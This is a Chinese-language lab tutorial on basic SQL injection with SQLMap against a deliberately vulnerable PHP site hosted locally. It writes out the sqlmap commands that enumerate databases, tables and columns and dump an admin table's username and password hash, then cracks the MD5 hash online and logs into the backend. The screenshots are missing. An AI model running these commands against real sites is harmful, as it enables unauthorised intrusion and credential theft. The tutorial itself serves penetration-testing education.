SQL注入基础步骤及SQLMap工具使用(二)

SQL注入基础步骤及SQLMap工具使用(二)

一、环境搭建

（一）、phpstudy2018集成环境安装使用

安装使用，自行百度，下载地址：官网地址

1. http://phpstudy.php.cn/

（二）、SQL注入源码

百度网盘：

1. 链接：https://pan.baidu.com/s/1B0VSwXk6JnZbBpRgr5S3iQ 密码：wgze

 (三）、SQLMap

SQLMap为Kali Linux平台集成工具

图示：

 

（四）、图示

目标网站：

1. http://localhost/sqls/index.php?id=1

 

二、SQL注入过程详解

（一）、查找注入点

       前面已经讲过不在赘述，注入点：

1. 1.http://localhost/sqls/index.php?id=1

（二）、SQLMap测试注入

1. sqlmap -u "http://192.168.21.100/sqls/index.php?id=1"

结果：

 

 （三）、获取后台账号、密码

    （1）、获取目标数据库

1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" --dbs

图示：

 

（2）、获取目标表名

root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test --tables

图示：

 

   （3）、获取目标字段

1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin --columns

图示：

 

（4）、获取字段内容

1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin -C "user,pwd" --dump

图示：

 

（5）、MD5在线破解

网站：

1. http://www.cmd5.com/

结果：密码-qazxsw

三、登录后台

图示：

 

最后说明：

以上只是SQLMap简单实用，参考：https://blog.csdn.net/qq1124794084/article/details/77851094想了解更多，可自行百度。

1. 

1. 

1. 

1. 

2. 

1. 

1. 

1. 

1. 

1.